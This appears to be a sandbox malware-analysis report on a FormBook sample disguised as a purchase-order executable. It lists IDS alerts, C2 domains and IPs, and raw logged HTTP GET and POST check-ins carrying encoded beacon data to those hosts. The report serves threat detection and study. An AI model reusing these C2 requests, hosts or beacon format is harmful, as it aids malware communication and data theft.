Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49916 -> 104.21.57.248:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49930 -> 104.21.57.248:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49953 -> 154.88.22.101:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49924 -> 104.21.57.248:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49960 -> 154.88.22.101:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49935 -> 104.21.57.248:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49935 -> 104.21.57.248:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49967 -> 154.88.22.101:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49973 -> 154.88.22.101:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49973 -> 154.88.22.101:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49998 -> 209.74.77.107:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49989 -> 209.74.77.107:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50005 -> 209.74.77.107:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50012 -> 209.74.77.107:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50012 -> 209.74.77.107:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50040 -> 104.21.34.103:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 104.21.34.103:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50044 -> 20.2.249.7:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50040 -> 104.21.34.103:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 104.21.34.103:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 47.254.140.255:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50044 -> 20.2.249.7:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 156.251.17.224:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50048 -> 156.251.17.224:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50048 -> 156.251.17.224:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 156.251.17.224:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 104.21.34.103:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 156.251.17.224:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 20.2.249.7:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 20.2.249.7:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 47.254.140.255:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 20.2.249.7:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50051 -> 47.254.140.255:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50052 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50052 -> 47.254.140.255:80
                Source: DNS query: www.soainsaat.xyz
                Source: DNS query: www.amayavp.xyz
                Source: DNS query: www.duwixushx.xyz
                Source: Joe Sandbox View, IP Address: 209.74.77.107
                Source: Joe Sandbox View, IP Address: 185.27.134.144
                Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\PO 4110007694.exe, Code function: 0_2_00C822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00C822EE
                Source: global traffic, HTTP traffic detected: GET /xxr1/?BTPDLZX=CTzPrZCB9Fii6KjTMWJ2M/WncddfpG5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66jciILoGQdVc74SRxgXHJUi2AjDZRtSfQFA=&WnQdf=JhLPW HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Host: www.nb-shenshi.buzz
                    Connection: close
                    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic, HTTP traffic detected: GET /sgdd/?BTPDLZX=n1rc2pzYlnLUqZJl2DrPSNjVvvG+B3kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSkv0BSFGr8wnshHLEWZTEWF2XmR1RoCWC90=&WnQdf=JhLPW HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Host: www.laohub10.net
                    Connection: close
                    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic, HTTP traffic detected: GET /rq1s/?WnQdf=JhLPW&BTPDLZX=8hQq9qCyJ4Zif0sZJ+qpsVVSiE3f8un3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF1d98q0hIrZL7k5AWWxKgNnUzBpRStLOb73o= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Host: www.xcvbj.asia
                    Connection: close
                    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic, HTTP traffic detected: GET /rum2/?BTPDLZX=xMZmeyR85UPBdQXFJZqJIEL01VnkhEfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBnlxZg+0WQQuds7/7InpDF8b2KXLH9po+SKk=&WnQdf=JhLPW HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Host: www.soainsaat.xyz
                    Connection: close
                    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic, HTTP traffic detected: GET /d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K7yngZPbDkFJ2MbPrWQrwotde8x+DERdOM8=&WnQdf=JhLPW HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Host: www.amayavp.xyz
                    Connection: close
                    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic, HTTP traffic detected: GET /vg0z/?BTPDLZX=75uk3ictCfC5d95gANF2nAu8q1moq+7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTGs6PncMbbDAs+z7vTlvvSa3jEJyrffOxyRk=&WnQdf=JhLPW HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Host: www.vayui.top
                    Connection: close
                    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic, HTTP traffic detected: GET /o362/?WnQdf=JhLPW&BTPDLZX=FaNItuPk5TcZ9HdSZBH/qM9rY38VGyvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqDzGT3SCCEwZiMzsN5+71dEwGtSagaXjd4i8= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Host: www.rgenerousrs.store
                    Connection: close
                    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic, HTTP traffic detected: GET /jhb8/?BTPDLZX=0R31+Vq/Nm8msnga4XjSJ8sAfUwJuuARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv0Pp97wC6ZYoPeW6DxktAXnOuh3ha64INvKA=&WnQdf=JhLPW HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Host: www.t91rl7.pro
                    Connection: close
                    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic, HTTP traffic detected: GET /alu5/?WnQdf=JhLPW&BTPDLZX=m83uTjDkEXAXcvpZaWV1PNYda+U7jg2fMbxp9Jcjydk1OP9q/x+Uq7Puqw1bWxP8wchYD7Gqx/Fq8mp+rVpxrxuW5VDk7Vq07uTWEP/Rgr9zrLSf1ip7NM4= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Host: www.learnwithus.site
                    Connection: close
                    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic, HTTP traffic detected: GET /1jao/?WnQdf=JhLPW&BTPDLZX=wXeCFQWa9OsffQZ1KRXPZEZX8+i6d5mUhyyCbFo+uZizrpQ17AwBRErPIC2GsWEsFfVeFw/t98C8OszppSdM3wkRcNb8cvMpvLzxOiNeiMb5wrheE0z0IqI= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Host: www.rafconstrutora.online
                    Connection: close
                    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic, HTTP traffic detected: GET /n7xy/?BTPDLZX=9kSByHmOdk8FUTJr+o8A3syTDbhMAn0rzNXDmTbYjaiqM3Vah8l/01w+tC+kGtOMFeVLDvKv+EgDTRurueNSiIvCBTHBcXkQVH4UQznoZd4uvjqdn9ipXGI=&WnQdf=JhLPW HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Host: www.7vh2wy.top
                    Connection: close
                    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic, HTTP traffic detected: GET /q0vk/?BTPDLZX=TqE1JZ2PW3JWY2uYnAavAXklIsUks6+yOAYp2neLNqkwqfDGdEjMQdAOFdDc8sxV6WeqUhb2JmW0DlQMLtnU6XPzOQdjNl3sAk02DQStC+27G1hNmCW/pJs=&WnQdf=JhLPW HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Host: www.duwixushx.xyz
                    Connection: close
                    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic, HTTP traffic detected: GET /x20l/?BTPDLZX=fuPwFllnLQvzi1y5p/ZpnhRgNM4mXlCpPG7RIdaZj/0kEynSdOAf8+xad2xabD02Zo5QEVuMD42Ooe6vMAhBaOmt5mAtHSKuJTa6Be4mvNoGTYEsb86Lrhw=&WnQdf=JhLPW HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Host: www.yvcp3.info
                    Connection: close
                    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic, DNS traffic detected: DNS query: www.nb-shenshi.buzz
                Source: global traffic, DNS traffic detected: DNS query: www.laohub10.net
                Source: global traffic, DNS traffic detected: DNS query: www.xcvbj.asia
                Source: global traffic, DNS traffic detected: DNS query: www.soainsaat.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.amayavp.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.vayui.top
                Source: global traffic, DNS traffic detected: DNS query: www.rgenerousrs.store
                Source: global traffic, DNS traffic detected: DNS query: www.t91rl7.pro
                Source: global traffic, DNS traffic detected: DNS query: www.learnwithus.site
                Source: global traffic, DNS traffic detected: DNS query: www.cuthethoi.online
                Source: global traffic, DNS traffic detected: DNS query: www.rafconstrutora.online
                Source: global traffic, DNS traffic detected: DNS query: www.7vh2wy.top
                Source: global traffic, DNS traffic detected: DNS query: www.duwixushx.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.yvcp3.info
                Source: unknown, HTTP traffic detected: POST /sgdd/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US
                    Host: www.laohub10.net
                    Origin: http://www.laohub10.net
                    Referer: http://www.laohub10.net/sgdd/
                    Cache-Control: no-cache
                    Content-Length: 204
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                    Data Ascii: BTPDLZX=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLerCQbFIajvkXbVH4vheu+GDMiqmgd1iYAw==
                Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Wed, 04 Dec 2024 11:49:34 GMT
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 2966
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: "66cd104a-b96"
                    Data Raw: [truncated HTML 404 page body omitted]
                Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Wed, 04 Dec 2024 11:50:08 GMT
                    Content-Type: text/html
                    Content-Length: 146
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Wed, 04 Dec 2024 11:50:10 GMT
                    Content-Type: text/html
                    Content-Length: 146
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Wed, 04 Dec 2024 11:50:13 GMT
                    Content-Type: text/html
                    Content-Length: 146
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Wed, 04 Dec 2024 11:50:16 GMT
                    Content-Type: text/html
                    Content-Length: 146
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.14.1
                    Date: Wed, 04 Dec 2024 11:50:31 GMT
                    Content-Length: 0
                    Connection: close
                    X-Rate-Limit-Limit: 5s
                    X-Rate-Limit-Remaining: 19
                    X-Rate-Limit-Reset: 2024-12-04T11:50:36.6409840Z
                Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 04 Dec 2024 11:50:53 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UnGooNiaR4%2FuFTm2O4Sm6jt2AkaVja2pFOJUbf3%2FwjQfPpmP%2Fyr76jgBmlLcCWtXYzVYWqIAIX5vITbrQgjG4kkP855rgiZI7sH%2FCQcn0MFLuLMWmC%2BbvxWWI4QDBqRn"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ecb94d84ee66a5c-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1592&rtt_var=796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=742&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Raw: [gzip-compressed chunked body omitted]
                Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 04 Dec 2024 11:50:56 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KCCU1hvuO5Ucax93Js2%2BHfNo578ShphpbdSlojgMcS04yQHd1VEkvptP3ECS6DahU4csB6chnMc%2B4i2IHv1jUgxbvfbBqAW5s%2BF8WjoCLRYfzDuZ%2BdM1b6zsXgrP4rCw"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ecb94e8a9697295-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1975&rtt_var=987&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Raw: [gzip-compressed chunked body omitted]
                Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 04 Dec 2024 11:50:58 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8V36aZKAN2KR4wBamopm6YlmOYJJNGiOg%2FhDWSx8yVpMW7fy9lTW9TQExCaHKs%2BZtmeloqKo%2FDGb8C2HaUGvmxn2wYSPmMcVaTSnFiwdn%2Fs%2B8NJUz4S6uYwBwdNWAl8G"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ecb94f97c84425d-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1601&rtt_var=800&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10844&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Raw: [gzip-compressed chunked body omitted]
                Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 04 Dec 2024 11:51:02 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=29QN4nssBjCi6ei6AYTKUd9by5RPCIaRp650AkRc09SPPCdP%2B%2B9RD6n9kFzVAl4UHT2ApV6NLP6Edtp47RiQWwrTAtFVp7pg32xKHRXgeLLgQDnjMvCqyQeFVSX94dg8"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ecb950afb5d42bd-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1595&rtt_var=797&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=480&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 04 Dec 2024 11:51:09 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sb1ErnMjzzR29hM0XBL129253GiHieYqwYrcSLfMlQbhuEYk9aHS8Rux2WlucpIHKgNqTCSaX3Euhy%2B5PZ0drXjRIg1M%2BiyIh08thSIdBCS7fN7gJ1YZ15tIUD2Sw2xQsyErS6uw2FA%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ecb95378883f78d-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1655&min_rtt=1655&rtt_var=827&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=766&delivery_rate=0&cwnd=52&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Raw: [gzip-compressed chunked body omitted]
                Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 04 Dec 2024 11:51:11 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b98QT9qej0L73OyLkjIj%2BijXP5uy5AyhEKTwjwsFG2RvBgsEleE%2B7pA1YMFD9ubpPJPcXkADTu9pnELn1aBhIVZppwMcrpzt1pXyVqPY3Nmxt33HTdSWmR6fRUgaDxMXsvFMVQDDyNc%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ecb95483e1142eb-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=2034&min_rtt=2034&rtt_var=1017&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Raw: [gzip-compressed chunked body omitted]
                Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 04 Dec 2024 11:51:14 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lUhPpNUjioXyUD7OJfPsS5NFvdnMVvDaBEK52pBvXGxf6NzvBp%2Feb%2B4SEWwKiEoJy9l%2BMb53ife7EbIYSOOVl43zEAzsEhnhuLcNQBFwauTDJozz8UOmx5zZYkl0Ok9Omi7dXTWFjq0%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ecb9558aefe5e64-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=2789&min_rtt=2789&rtt_var=1394&sent=6&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10868&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Raw: [gzip-compressed chunked body omitted]
                Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 04 Dec 2024 11:51:17 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DHce4l%2BPo4yJN2jVNLNVpoyuOZjBNgQXHw8gRGojleO7rzKLhaz9tMObW%2FEZ8njt%2FSaT6Tluoh92DKpjLDUEs6Ut810D9okf7Iqu9j4lKnPD%2BCHdIvFsfvNKbYS3xpa7Rlt5t1YfrKY%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ecb95695f0243f1-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1675&rtt_var=837&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=488&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Ascii: 118<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>10
